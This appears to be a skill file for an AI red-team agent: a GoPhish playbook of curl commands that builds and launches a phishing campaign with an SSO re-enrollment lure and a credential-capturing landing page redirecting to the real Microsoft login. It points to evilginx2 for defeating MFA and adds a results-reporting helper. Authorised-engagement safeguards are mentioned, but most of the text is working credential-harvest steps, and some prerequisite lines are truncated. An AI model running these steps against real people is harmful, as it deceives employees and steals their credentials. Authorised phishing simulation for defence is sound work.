gophish-campaign
Build and launch a tracked phishing campaign with the GoPhish REST API — sending profile, groups, email template, landing page, launch, and event polling.
| name | gophish-campaign |
| description | Build and launch a tracked phishing campaign with the GoPhish REST API — sending profile, groups, email template, landing page, launch, and event polling. |
| metadata | {"subdomain":"phishing","when_to_use":"gophish, phishing campaign, email template, landing page, campaign tracking, credential harvest landing","mitre_attack":["T1566.002","T1598.003"],"tags":["phishing","gophish","campaign"]} |
GoPhish drives the credential-harvest landing-page flow and the
click/submit tracking the report needs. Use it for the "fake login
page" path; use evilginx2-proxy instead when you must defeat MFA.
- gophish binary; admin API on https://127.0.0.1:3333, phish server on :80/:443).
- GOPHISH_API_KEY exported (read from the admin UI once).
- lure-deconfliction handshake COMPLETE for this campaign.
- lookalike-domain) and a pretext (pretext-engineering).

```bash
API=https://127.0.0.1:3333/api
H="Authorization: Bearer $GOPHISH_API_KEY"

# 1. Sending profile (SMTP)
curl -sk -H "$H" -H 'Content-Type: application/json' $API/smtp/ -d '{
  "name":"eng-smtp","host":"smtp.lure-domain.example:587",
  "from_address":"it-support@lure-domain.example",
  "username":"...","password":"...","ignore_cert_errors":true}'

# 2. Target group (from plan/phisher/pretext.md shortlist)
curl -sk -H "$H" -H 'Content-Type: application/json' $API/groups/ -d '{
  "name":"wave1","targets":[{"email":"alice@acme.example","first_name":"Alice","last_name":"R"}]}'

# 3. Email template (include the X-Decepticon-Eng header + opt-out URL)
curl -sk -H "$H" -H 'Content-Type: application/json' $API/templates/ -d '{
  "name":"sso-migration","subject":"Action needed: SSO re-enrollment",
  "html":"<a href=\"{{.URL}}\">Re-enroll</a> {{.Tracker}}"}'

# 4. Landing page (capture creds, then redirect to the real site)
curl -sk -H "$H" -H 'Content-Type: application/json' $API/pages/ -d '{
  "name":"sso-landing","html":"<form>...</form>",
  "capture_credentials":true,"redirect_url":"https://login.microsoftonline.com"}'

# 5. Launch
curl -sk -H "$H" -H 'Content-Type: application/json' $API/campaigns/ -d '{
  "name":"acme-wave1","template":{"name":"sso-migration"},
  "page":{"name":"sso-landing"},"smtp":{"name":"eng-smtp"},
  "url":"https://login.acme-portal.example","groups":[{"name":"wave1"}]}'

# 6. Poll results
curl -sk -H "$H" $API/campaigns/ | jq '.[].results[] | {email,status}'
```
Each submitted credential → Credential node linked to the User
node with an OBTAINED_VIA edge carrying the campaign id. Save the raw
GoPhish results JSON under evidence/phisher/<campaign>.json.
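
Added example, not part of the original skill or of GoPhish itself: a reporting helper that turns the saved results JSON into the aggregate funnel and user-report rate the engagement report and the blue team need, without copying addresses or captured data into the summary. It assumes the `status` strings and the `reported` boolean as GoPhish returns them in `results[]`; the function name `funnel` and the sample data are constructed for illustration.

```python
import json
from collections import Counter

# Status strings GoPhish writes to results[].status, in funnel order.
FUNNEL = ["Email Sent", "Email Opened", "Clicked Link", "Submitted Data"]

def funnel(campaigns):
    """Aggregate per-campaign counts from GET /campaigns/ style JSON (a list)."""
    report = {}
    for camp in campaigns:
        results = camp.get("results") or []
        counts, other = Counter(), Counter()
        for r in results:
            status = r.get("status", "")
            if status in FUNNEL:
                # status records only the furthest stage reached,
                # so credit every earlier stage as well
                for stage in FUNNEL[: FUNNEL.index(status) + 1]:
                    counts[stage] += 1
            else:
                # Scheduled, Sending, Error, ...: never reached the inbox
                other[status or "unknown"] += 1
            if r.get("reported"):
                counts["Reported"] += 1
        total = len(results)
        row = {s: counts[s] for s in FUNNEL + ["Reported"]}
        row["targets"] = total
        row["not_delivered"] = dict(other)
        # share of targets who reported the lure: the defender-side metric
        row["report_rate"] = round(counts["Reported"] / total, 2) if total else 0.0
        report[camp.get("name", str(camp.get("id")))] = row
    return report

# Constructed sample in the shape of evidence/phisher/<campaign>.json
SAMPLE = json.loads("""[{"id": 1, "name": "acme-wave1", "results": [
 {"email": "alice@acme.example", "status": "Submitted Data", "reported": false},
 {"email": "bob@acme.example",   "status": "Clicked Link",   "reported": true},
 {"email": "carol@acme.example", "status": "Email Sent",     "reported": true},
 {"email": "dave@acme.example",  "status": "Error",          "reported": false}]}]""")

if __name__ == "__main__":
    print(json.dumps(funnel(SAMPLE), indent=2))
```
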
- opsec_level (stealth ≤2/h, standard ≤20/h).
- gophish_pause_campaign (PUT $API/campaigns/:id/complete) halts sending instantly on a SOC stop request.